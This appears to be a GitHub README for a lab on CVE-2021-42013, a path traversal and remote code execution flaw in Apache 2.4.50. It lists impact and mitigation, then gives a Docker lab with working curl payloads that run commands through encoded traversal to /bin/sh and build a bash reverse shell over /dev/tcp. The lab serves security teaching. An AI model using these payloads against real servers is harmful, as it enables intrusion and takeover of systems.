/CVE-2021-42013

CVE-2021-42013, a critical vulnerability in the Apache HTTP Server (2.4.50)

Primary LanguagePythonMIT LicenseMIT

CVE-2021-42013: Apache HTTP Server Path Traversal and Remote Code Execution Vulnerability

Overview

This repository provides information and resources related to CVE-2021-42013, a critical vulnerability in the Apache HTTP Server (versions 2.4.50). The vulnerability allows for path traversal and remote code execution (RCE) through a crafted URL path, enabling attackers to access and execute files outside the server's document root.

Details

  • CVE Identifier: CVE-2021-42013
  • Severity: Critical
  • Affected Versions: Apache HTTP Server 2.4.50
  • Fixed Version: Apache HTTP Server 2.4.51 or later

Description CVE-2021-42013 is a vulnerability resulting from an incomplete fix for CVE-2021-41773. This flaw permits attackers to perform path traversal and potentially execute arbitrary code on the server. Exploitation of this vulnerability can lead to significant security breaches, including unauthorized access to sensitive data and full system compromise.

Impact

Successful exploitation of CVE-2021-42013 can result in:

  1. Unauthorized File Access: Attackers can access files outside the server’s document root, including sensitive system files, configuration files, and other protected resources. This could lead to the exposure of critical information, such as credentials, internal configurations, and other sensitive data.

  2. Remote Code Execution: By accessing and executing arbitrary files, attackers can potentially run malicious scripts or binaries on the server. This could allow them to take control of the server, install malware, create backdoors, and manipulate server operations.

  3. Service Disruption: Unauthorized access and execution of commands can disrupt normal server operations, leading to downtime, performance degradation, and denial of service (DoS) conditions. This impacts the availability and reliability of the services hosted on the server.

  4. Privilege Escalation: In cases where the server runs with elevated privileges, an attacker exploiting this vulnerability could gain administrative access, allowing them to perform further malicious activities and escalate their control over the server environment.

  5. Data Integrity Compromise: Attackers could modify or delete critical files, compromising the integrity of the data hosted on the server. This includes altering website content, defacing web pages, or tampering with application data.

Mitigation

To protect your server from CVE-2021-42013, it is crucial to:

  1. Update Apache HTTP Server: Upgrade to version 2.4.51 or later, where this vulnerability has been addressed.
  2. Restrict Access: Ensure proper server configuration to restrict access to only necessary files and directories, reducing the risk of path traversal attacks.

Simulation

Now, how about we do the simulation shall we? Before we start, you need to have docker engine. The installation is pretty simple, just make sure you have docker engine ready in your computer. I will help you provide the link here. We use docker for the lab to make sure our simulation for the exploitation of the vulnerability is in line with the ethical hacking. Now enough yapping, let's start it!

Usage

  1. Clone this repository

Use git command to clone the repository

git clone https://github.com/rafifdna/CVE-2021-42013.git

Go to the directory of the file

cd CVE-2021-42013
  1. Prepare Lab

First, build the images of the Dockerfile with the command below :

docker build -t apache-lab

Then, after the images is build, run the docker images with the command below :

docker run -dit -p 888:80 apache-lab
  1. Verify Lab (Optional)

You can also check the docker to make sure the lab is running.

docker ps

docker logs <container-id>

Make sure the web is running, you can try curl the web to see the output.

curl http://172.17.0.2:888
  1. Execution

Install the library requirement

pip install -r requirements.txt

You can use the script of exploit.py to perform vulnerability checking whether the website you targeted is vulnerable to the exploit or not before continue to the execution. This script include Path Traversal and Remote Code Execution (RCE).

python3 exploit.py -u http://172.17.0.2

Next, try using curl if we can

curl 'http://172.17.0.2:888/cgi-bin/.%%32%65/.%%32%65/ .%%32%65/ .%%32%65/bin/sh' -- data 'echo Content-Type: text/plain; echo; uname -a'

curl 'http://172.17.0.2:888/cgi-bin/.%%32%65/.%%32%65/ .%%32%65/ .%%32%65/bin/sh' -- data 'echo Content-Type: text/plain; echo; ls'

Exploitation

  1. Remote Code Execution

Using Reverse Shell With Netcat

curl 'http://172.17.0.2:888/cgi-bin/.%%32%65/.%%32%65/ .%%32%65/ .%%32%65/bin/sh' -- data 'echo Content-Type: text/plain; echo; echo "#!/bin/bash" > /t
mp/lab.sh'

curl 'http://172.17.0.2:888/cgi-bin/.%%32%65/.%%32%65/ .%%32%65/ .%%32%65/bin/sh' -- data 'echo Content-Type: text/plain; echo; echo "bash -i >& /dev/t
cp/127.0.0.1/221 0>&1" >> /tmp/lab.sh'

curl 'http://172.17.0.2:888/cgi-bin/.%%32%65/.%%32%65/ .%%32%65/ .%%32%65/bin/sh' -- data 'echo Content-Type: text/plain; echo; cat /tmp/lab.sh'

Using Metasploit

References

CVE-2021-42013 Details